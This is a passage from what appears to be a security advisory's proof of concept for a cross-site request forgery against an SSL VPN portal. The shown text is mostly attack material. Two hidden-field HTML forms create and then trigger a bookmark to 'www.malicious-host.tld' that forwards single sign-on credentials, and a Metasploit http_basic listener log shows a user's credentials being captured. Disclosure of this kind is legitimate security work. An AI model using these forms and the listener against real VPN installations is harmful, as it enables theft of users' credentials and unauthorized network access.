      <input type="hidden" name="host" value="www.malicious-host.tld" />
      <input type="hidden" name="description" value="bar" />
      <input type="hidden" name="tabs" value="Baz" />
      <input type="hidden" name="service" value="HTTP" />
      <input type="hidden" name="fbaSSOEnabled" value="on" />
      <input type="hidden" name="fbaSSOFormUserName" value="user" />
      <input type="hidden" name="fbaSSOFormUserPassword" value="password" />
      <input type="hidden" name="MC&#95;App" value="inherit" />
      <input type="hidden" name="MC&#95;Copy" value="inherit" />
      <input type="hidden" name="MC&#95;Print" value="inherit" />
      <input type="hidden" name="MC&#95;Offline" value="inherit" />
      <input type="hidden" name="name" value="name" />
      <input type="hidden" name="type" value="type" />
      <input type="hidden" name="owner" value="owner" />
      <input type="hidden" name="cmd" value="add" />
      <input type="hidden" name="wantBmData" value="true" />
      <input type="hidden" name="ok" value="OK" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2. Call the newly created bookmark
This might require some guesswork, because we don't know which value bookmarkAccessed needs to have.

<html>
  <body>
    <form action="https://vulnerable.vpn-installation.tld/cgi-bin/http">
      <input type="hidden" name="HOST" value="www.malicious-host.tld" />
      <input type="hidden" name="bookmarkAccessed" value="4" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

3. Set up a listener
E.g. metasploit payload 
use auxiliary/server/capture/http_basic

msf auxiliary(http_basic) > 
[*] Listening on 0.0.0.0:80...
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://www.malicious-host.tld:80/
[*] Server started.
[*] vulnerable.vpn-installation.tld    http_basic - Sending 401 to client vulnerable.vpn-installation.tld
[+] vulnerable.vpn-installation.tld    http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password"